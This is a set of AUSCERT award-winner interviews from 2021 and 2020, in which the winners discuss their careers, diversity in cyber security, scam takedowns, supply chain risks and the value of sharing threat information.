AUSCERT2021 Information Security Excellence Winner [A copy of this interview article is also featured on Edition 3 of the Women in Security Magazine, published by Source2Create.] Jacqui is Founder and Executive Manager of the Australian Women in Security Network (AWSN) which aims to connect, support and inspire more people, in particular, women and female-identifying professionals to pursue a career in security. She is also co-author of the international book ‘Women in the security profession’. In April 2021, Jacqui decided to take a leap of faith and is now devoting 100% of her time to building the AWSN as a not-for-profit organisation. In short, AWSN has been Jacqui’s “passion project” for close to 7 years. Today, AWSN is a national group of close to 2,500 members across Australia with linkages to a number of prominent sponsors. It is an open network of people aiming to grow the number of women and female-identifying professionals in the cyber security community. AWSN’s mission is to support, inspire, and connect women and female-identifying professionals in the industry and those looking to enter the field with the tools, knowledge, a connected network and platforms they’ll need in order to build their confidence and cultivate their interest. Kudos to Jacqui for her tireless work in building the AWSN to where it is today, and with that – it is with great honour that we award her the Winner of Information Security Excellence in 2021.  Tell us a little about your professional career? My interest in technology started off when I worked at a help desk at Australia Post and in the area of  PC support at an insolvency company during uni where I studied a Bachelor of Information Systems. I then graduated and became a unix adminstrator for a few years before then deciding that I wanted to see and travel the world! When I was back-packing in Europe I ran out of money (as you do!) and got a job working on the helpdesk at Schlumberger. 
I got the opportunity to retrain to be a technical consultant. They put me through some really intensive technical networking and security training and at the end they asked what I wanted to do. I thought security was interesting, and this is pretty much how my security career journey began! I then worked as a security consultant for multiple large scale projects where I’d worked on a variety of different areas such as implementing AV, PKI solutions, performing risk assessments and technical assessments, policy-writing, and basically anything that was thrown at me at the time. I ended up spending 7 years in London and 7 years in Paris as a consultant working on many interesting projects which I loved. When I came back to Australia, I continued to consult on different projects before then moving to the in-house security team at ANZ. I started in their Identity and Access Management (IAM) team, then moved on to designing the cybercrime controls for ANZ’s institutional banking arm; and finally moved to head the Security Education and Influence team in a job share role. I then decided that I really wanted to help small businesses who I saw being affected by cybercrime and ended up spending a year in start-up land with the folks at Cynch Security. You’re the founder of AWSN. Can you tell us more about how AWSN was born and what your mission is? The idea of the AWSN (Australian Women in Security Network) was born when I returned from a 14-year stint overseas and came back to Melbourne. I walked into a security event and was overwhelmed by being the only female in the room. It was something I had gotten used to in Europe; but it really hit me when I came back to my home country to see and experience  it, especially when I didn’t know anyone in the room. I’d met one other female participant and she took me under her wing and introduced me to some people. 
We then brought together a number of female colleagues for casual breakfasts and met up before the start of security conferences. We spoke about how much we enjoyed working in security and some talked about the challenges they faced with being the only females in their teams. After a while, I was thinking that there may be other women out there also feeling alone, so I started a LinkedIn group. This then grew organically over time and soon local state-based chapters started to pop up across Australia. These then grew into more formal events and now our community consists of around 2500 people. The AWSN is an open network of people aiming to grow the number of women in the security community. We support, inspire, and act as role models. We connect women in the industry and those looking to enter the field with the tools, knowledge, network and platforms needed to build confidence and interest. As a network, we know the diversity of online threats require diversity of thought on how to address them, and this is where our network thrives.We do this mainly through events, hand-on workshops, training, mentoring and speaking engagements through community groups, universities and high schools. Congratulations on winning the Information Security Excellence award! What does winning this award mean to you? It was an absolute honour to have received this award. This means so very much to me and I sometimes still pinch myself with disbelief! I believe that this is a community recognition award, as the AWSN couldn’t have got to where it is today without all the volunteers, sponsors, donors, mentors, coaches, speakers, writers and all the people supporting us over the years. Receiving this award means that the Information Security industry in Australia recognises that what the AWSN is doing is important and meaningful work AND that we are on the right track with what we are trying to achieve. 
It means that all the hard work and hours that myself and all our volunteers put in to make AWSN what it is today is worth it! Thank you to everyone who has contributed to our cause, you know who you are.

What do you see as some of the main cyber threats in today’s society and their accompanying risks? Are you seeing any trends of particular threats becoming more common?

Good question! There are many and I could probably talk for hours on this topic. But if I were to choose two, which I think we as a society/community need to work together on a lot more, they are application vulnerabilities and supply chain risks. As we continue to use technology and build systems, apps, software faster than ever – often security is something that is considered at the last minute or sometimes, never! We shouldn’t expect the users of our systems or apps to know what to look out for when it comes to a security breach. Hence, it is my personal belief that technology should really adopt a “secure-by-design” philosophy and make it easy for users to apply security updates when they are required. When it comes to the topic of supply chain risk, some of these cyber threat issues stem from the fact that small businesses (which btw, constitute 98% of all Australian businesses**) often cannot afford security consultants to help them with implementing secure processes or expensive security services and products to protect their company assets. These businesses are particularly vulnerable to threats such as business email compromise (BEC), ransomware or data breaches which are increasingly becoming more and more common. These can have downstream implications on large corporations, critical infrastructure and Government agencies as it is very likely that at some point these smaller businesses are further down in their supply chain. It’s cliché, but cyber security really IS in everyone’s interest – no matter the size of your workplace.
** figure obtained from the Australian Small Business and Family Enterprise Ombudsman (ASBFEO)

If you could give one piece of advice for organisations and IT/cyber security professionals, what would that be?

To stay humble and keep an open mind. Remember and realise that most of our society doesn’t know what we know, and that no question should be considered a silly question. I don’t think that there is anyone in our sector who knows absolutely everything about security, so we shouldn’t treat/blame users like they should have known better in case of a breach or an incident. There are many people out there (they could be your grandparents, friends, family members and colleagues) who are confused and overwhelmed by what they know and what they don’t know about the topic of cyber security. It is this stigma that cyber security is difficult and tricky which often makes many security departments feared or perceived to be unapproachable. We, as a community, therefore all have a responsibility to show them that we are keen to help them learn and have them join us on this journey. We cannot fight this battle with just technology and largely rely on humans to report things that are suspicious, to consult with us before they are about to go live with a system and to sign off on our budgets. Therefore, we need everyone on our side and we need to show that we are open to listen and help. As a community, I think we need to communicate better, prioritise (based on known risks) and provide them with easy and accessible information, solutions and advice – so as not to confuse the general public further.

What’s one common challenge you find women and female-identifying professionals are facing in the cybersecurity industry and how can organisations continue to support them?
A common challenge I’ve personally found with women and female-identifying professionals in male-dominated teams is that they feel they are not heard or given the same opportunities as their male counterparts. They are often questioned why they are there and instead of asking or referring to them as subject matter experts, they are sometimes asked to be referred to a male counterpart as it’s assumed they don’t know the answer or have anything to contribute to a particular security topic. Everyone should be given an equal opportunity to contribute, and by this I don’t mean just females, but also young/elderly males, people of different ethnicities, people of different backgrounds who need a voice. Organisations must address this better; it needs to be a fundamental yet important goal within all teams or we will continue to lose good talent! And when good talent is lost, it makes it hard for upcoming new talent to see people like themselves in a career path in security, and we absolutely need this new talent in order to fight the new security and technology challenges ahead.

AUSCERT2021 Diversity and Inclusion Champion

This year, to mark the occasion of AUSCERT’s 20th annual conference anniversary, the team has decided to introduce a new award category – the AUSCERT Diversity & Inclusion Champion. At AUSCERT, we believe that Diversity & Inclusion champions are leaders who take responsibility for instilling a diverse and inclusive workplace culture. According to the Diversity Council of Australia, the definition of a Diversity & Inclusion champion is someone who plays both a symbolic and an active strategic role. Their symbolic function is to demonstrate leadership support for diversity and inclusion by attending diversity events and delivering diversity messages to stakeholder groups within the company and externally. They contribute to diversity strategy development and implementation by serving on diversity councils, campaigning for support from their fellow colleagues, and consulting with diversity leaders. Pip Jenkinson, CEO and Co-Founder of Baidam Solutions, is the inaugural winner of this AUSCERT award. For those unfamiliar with Pip, his work at Baidam emphasises the importance of partnerships with some of Australia’s largest employers to create job opportunities and funding for cybersecurity certification training. Baidam gives a significant percentage of the company’s profits to providing pathways to employment in the IT sector for Indigenous and First Nations people. Pip’s and Baidam’s journey is an inspiring story and shows a great example of how organisations can combine profit with social good. It is with great honour that we award Pip with the inaugural AUSCERT Diversity & Inclusion Champion award.

Tell us a little about your professional career?

I have had a very diverse career and my pathway to a career in cyber security certainly wasn’t a straight line. Growing up on a farm in Bathurst NSW, I have worked in shearing sheds, at building sites; and I have also served in the Army.
I then decided to enrol at university as a mature age student in a Business degree. My first “real” job outside of university was a sales representative for Guinness in Dublin, Ireland and I was fortunate to travel around the United Kingdom, working in some pretty amazing places. I returned to Australia and stayed within the wine trade, working (and tasting) some of Australia’s best wines and meeting some extraordinary people who were producing wine at an award-winning International standard. These folks were all working really hard to cement the image of Australia as a producer of wine that would rival some of the most famous International brands. One day, out of the blue I decided to apply for a role in ICT sales, working for a large cyber security vendor. When I was shortlisted for an interview, I was so nervous about meeting my potential line manager because I didn’t know much about the sector but I gave it my best shot. There were 4 interview rounds in total and there were many other competitive applicants with greater experience than myself, but when I was offered the role, it was life changing for me! This in turn motivated me to ask for some feedback and I was promptly told that I was hired based on attitude, not aptitude. I was motivated to learn as much as I could and certainly made mistakes along the way – but I was so grateful for the opportunity to improve, to earn a good wage and to always remember where my start in the cyber security industry came from; and hopefully one day, being able to repay this gesture and opportunity.

Can you tell us more about your work at Baidam?

At a macro level, Baidam Solutions is an Indigenous owned enterprise. Baidam is a supplier of cyber security goods and services to State and Federal governments and ASX-listed corporations. We model our offerings around the ASD “Essential Eight.” At a micro level, we have created a pretty special business model that directly links a social outcome to a commercial drive.
From the profits retained within our supply-chain and it in itself being free from any Government assistance or subsidy, we have been able to support two lifetime University based scholarships for Indigenous students in the STEM fields; as well as numerous industry recognised certifications. The recipients of these scholarships are now working within various SOC teams across Australia. I am incredibly fortunate to work in a team that all share a single company vision and company mission – “To increase Indigenous diversity and inclusion in the ICT sector by using education as a vehicle to build technical equity in our First Nations cyber security aspirants.”

Congratulations on winning the Diversity and Inclusion Champion award! What does winning this award mean to you?

I was absolutely humbled and quite frankly, speechless to win the award! I received the award on behalf of the whole team at Baidam Solutions. We all know that cyber security is a team sport and there is a great team that stands beside me. The award was really special, being the first at anything is hard, but also rewarding. We are the first Supply Nation certified cyber security practice headquartered in Queensland. Therefore, it is our job to help other Indigenous security professionals get a foothold in the industry and it is our job to lead by example, in everything we do. To be the recipient of the inaugural AUSCERT Diversity and Inclusion Champion award is a huge honour and one that must be given the respect that it deserves, to continually uphold the principles of Diversity and Inclusion and be a role model for others to follow.

What recommendations would you give to other organisations looking to provide pathways for employment in the IT sector for Indigenous and First Nations peoples?

Do your research. Be committed and do it for the RIGHT reasons. Invest in cultural immersion programs to lift the knowledge of the entire organisation, don’t leave everything to the folks from Human Resources.
Obtain advice and understand that there are many cultural events that don’t neatly sit within a standard Fair Work Act 2009 employment contract. Be sensitive and flexible and if you do a good job, the results will speak for themselves; you will enjoy a richer, more diverse and inclusive employee talent pool that is more representative of the community that you operate in.

Baidam’s journey is an inspiring story and a great example of how organisations can combine profit with social good. What advice would you have for organisations looking to do this?

Well, this one is very simple. Just do more and do it more often! We are showing other organisations what is possible when focused on sustainable, social return on investment (SROI) rather than purely ROI. Whether you are looking to support Women’s businesses, Veterans businesses, LGBTIQ+ businesses, Australian Disability Enterprises or a myriad of other social businesses, find a reason to do business other than the pursuit of profit! Draw a line in the sand today, not tomorrow and stand for something other than profit; your customers will appreciate it and so will your staff.

Finally, what do you think are the main challenges and opportunities for the cyber security industry in the coming years?

Like my past experience in the wine trade industry, Australia has the opportunity to be recognised as a global leader in the production of cyber security talent as well as sovereign cyber security solution capabilities – truly! As a community, we need to do more to support the local companies who are helping this flourishing marketplace. So where possible, buy local, support local and invest locally. I think the Australian Government is doing a good job in supporting this idea, but as with most things, greater work needs to be done. The challenges in our sector are well documented and include, amongst others, a skills shortage and a culture of sourcing projects off-shore.
The final challenge, directly linked to the Indigenous cultures that Baidam represents (one that we all need to overcome!) is a mental one … We MUST change our thoughts from “Why would I buy through an Indigenous business?” to “Why wouldn’t I buy from an Indigenous business?” To sum it up for me, I’d like to share this Norman Vincent Peale quote, “Change your thoughts and you can change your world”.

AUSCERT2021 Member Organisation of the Year Winner

We recently had the pleasure of chatting with Daniel Ross and Cody Byrnes from the Australian Taxation Office (ATO) who won the AUSCERT Member Organisation of the Year for 2021. Daniel and Cody both opened up about what it is like to be an AUSCERT member and how the ATO is dealing with new cyber security issues.

How long has the Australian Taxation Office been an AUSCERT Member?

Our membership goes back well over 10 years, and we’re always really pleased to come along to the AUSCERT conference each year. This was Cody’s and my first year in attendance and it was an overall fantastic experience.

What value do you get out of the on-going AUSCERT membership?

Our membership with AUSCERT has been invaluable in helping us successfully respond to the myriad of tax and super scams targeting Australians on a daily basis. The AUSCERT Team support us through the takedown of malicious phishing websites, domains and spam email accounts used in these scam campaigns, blocking the ability of the scammers and heavily reducing the number of potential scam victims. Their assistance in sharing the details of these scams with other AUSCERT members also broadens our reach in stopping these scams and heightens our ability to detect future scam campaigns.

Congratulations on winning the Member Organisation Of The Year award! What does winning this award mean to you?

Thank you! AUSCERT has provided much benefit to ATO over the years. It is great to know that the threat intelligence we share back with them and the broader community is of equal benefit and we appreciate receiving such recognition for this.

What advice would you give other AUSCERT members?

Engage and be involved with AUSCERT and the community members, and share back what you can, as we are stronger at defending against threats as a community.

What cyber security challenges have you faced this year?
We think we see a lot of similar challenges to other cyber security teams we talk to: making sure we’ve got the right resourcing, tools and skills in an ever-evolving landscape. One of the more specific challenges we face is protecting the public from ATO themed scams that try to steal their money or personal information. We’ve got a number of preventative strategies in place, as well as rapidly responding to threats as they emerge. This is where we work closely with AUSCERT to quickly respond. It’s very easy for a malicious actor to create a domain with ATO or tax in the title, so we need intelligence to identify these and quick response pipelines to de-activate the malicious domain and minimise the risk of a member of the public being compromised.

What do you see as some of the main cyber threats in today’s society?

Patching, scams, and supply chain are recurring common threats in today’s society. We see malicious actors weaponising vulnerabilities before patches have been implemented and therefore patching is still a very effective security mechanism in preventing threats to individuals and organisations alike. Scams continue to be an effective method in circumventing technical controls, and supply chain is increasingly targeted as a method of compromising the clients of the particular chain.

AUSCERT2021 Member Individual of the Year Winner

After the recent AUSCERT2021 conference, we caught up with Simon Coggins (Principal Systems Engineer at CQUniversity) to discuss his role in the cyber security sector, and how he felt about being awarded AUSCERT2021’s ‘Member Individual of The Year’.

Tell us a little about your professional career?

I’ve always been interested in system administration and networking. When I was in high school I started my own Bulletin Board System with a large user base and had a FidoNet address so that we could transfer email and forum posts around the world. While studying at university I started working at the local Internet Service Provider. We were small enough to only have a few staff so everyone had multiple jobs. I was a Sysadmin, Network Engineer, Developer and Tech Support. This led me to work at a University in NSW where I was the Network and Systems Management Officer. My role there involved both networking and system administration duties as well as acting as a translation bridge between the network team and the sysadmin team. After working for 6 years at this university, friends I knew through the System Administrators Guild of Australia suggested I apply for a job at Central Queensland University, so I did. That brings me to my current job that I’ve been in for over 15 years now. I started out as a Senior Systems Administrator and a few job title changes and roles later I’m now a Principal Systems Engineer. Because of my System Administration and Networking background and an understanding of how everything fitted together, this acted as a catalyst for security to start being included in things I was looking at.

What’s involved in your day-to-day role as Principal Systems Engineer at CQUniversity?

I’m always busy doing something and every day is different. I’m the primary lead on our Linux Fleet, Firewalls, Load Balancers, SIEM platform, SAN Storage, Email Security, and the list goes on.
So on any given day I will be doing operational work to keep the fleet of services running, level 3 work tickets that come in about weird issues that need problem solving, or project work for evaluating new products and testing them. Given I have a better than average understanding of how our network and systems fit together, and I have good problem solving skills, that allows me to help identify the cause of complex issues quicker. I like to think that my primary role is to automate my boring jobs where possible so I can focus on the fun ones but at the end of the day, I’m just someone that likes to solve problems, and in the process help people.

Congratulations on winning the Member Individual of the Year! What does winning this award mean to you? What course will you use your SANS-sponsored prize for?

It’s a great honour. AUSCERT is very trusted in the security community so getting this award is a huge deal. For me it means that what I’m doing is definitely helping other people. When I do things for CQUniversity I think to myself “Would this help me if someone else shared it?” If so, then I go and share that with the wider community via AUSCERT. This award reaffirms I’m doing good in the community. As for SANS courses, have you seen the list? It’s huge! I’m still trying to decide what I want to do, I’m thinking maybe Continuous Monitoring and Security Operations or something else on the Blue Team track.

What do you see as some of the main cyber threats in today’s society? Are you seeing any trends of particular threats becoming more common?

Ransomware and Phishing are the obvious choices, but for us we are seeing more and more supply chain attacks. The SolarWinds and PasswordState attacks drive home that you can do everything you possibly can to protect your systems, but you are only as good as the security of the companies that provide your tools.
We need to update to fix security vulnerabilities but we can’t update until we’re sure the update hasn’t been compromised. Delay updating and you could end up with ransomware, be proactive and end up with a state based actor in your systems … It’s getting very hard!

If you could give one piece of advice for organisations and IT/cyber security professionals, what would that be?

In most cases you aren’t the only one defending against that cyber incident. At the end of the day we’re all Cyber Security Professionals and we’re probably defending against the same thing, at least across the same industry. You might be surprised to find out that your industry, even though it is competitive at front of house, already has an information sharing mechanism in place to assist and share common threats across the industry and there is a good chance that AUSCERT knows where to point you. They are also happy to accept any security reports, malware samples, and indicators of compromise that you might have, anonymise them and share them with the wider community of AUSCERT members if you wish to remain anonymous.

AUSCERT2020 Member Individual of the Year Winner

During the AUSCERT2020 Conference, we caught up with Rachael Leighton (Principal Advisor, Cyber Strategy & Awareness @ DPC Vic Gov) to discuss her role in the cyber security fight, and how she felt about being awarded AUSCERT2020’s ‘Member Individual of The Year’.

Tell us a little about your professional career?

I actually started as a primary school teacher by trade. Then, during 2009 I worked as a volunteer firefighter and ended up contributing towards a community education program. This was my initial foray into IT, as part of the education project involved upgrading radios and informing the community on what to do. After this, I continued to work for different companies in an organisational change capacity. Eventually I ended up in a Big 4 bank and was working on the same floor as the anti-terror and anti-fraud team. One day I asked them—how do people learn and understand this stuff about cyber security? I realised that if I didn’t know it, surely others didn’t either. From there, my passion for educating people and encouraging organisations to change their behaviour, to consider cyber security and to cultivate a cyber culture was born.

What’s involved in your day-to-day role as Principal Advisor—Cyber Strategy & Awareness for the Department of Premier and Cabinet?

I see myself kind of like a conductor of an orchestra. When we think of cyber security and government, we, as government have a role in creating a Cyber Safe Victoria and that means… there are lots of moving parts – lots of activity that needs to take place and lots of different teams to secure all our kit. There is still some heavy lifting to do to connect the dots between academia, industry and government to form a vibrant cyber ecosystem. That’s my role – to bring all this together, usually through engaging and meeting with the right people, identifying synergies and opportunities for connecting them together.
Congratulations on winning Member Individual Of The Year. What does winning this award mean to you?

I’m so honoured to get this award. To me, this validates the importance of collaboration. At the end of the day, cyber is hard. If we want to get ahead of the bad guys, we need to be sharing info, reporting incidents, and establishing a trusted and healthy feedback loop. This can be difficult to achieve when the traditional mindset of cyber security professionals is to protect what’s valuable. Yet it’s more beneficial for us all to break down the walls and build trust across the cyber community. Trust was immediate for me when working with AUSCERT. The team will do anything they can to help Vic Gov uplift cyber posture. So thanks AUSCERT, I really appreciate this award. To be recognised for the willingness, and the crazy, that is cyber education and engagement is beautiful.

If you could give one piece of advice for organisations and IT / cyber security professionals, what would that be?

Reach out—don’t go it alone. Don’t try to be a lone hero—we are stronger together. We are a cyber family. Just like the baddies work together and collaborate, if we want to succeed against them, then we too need to work together.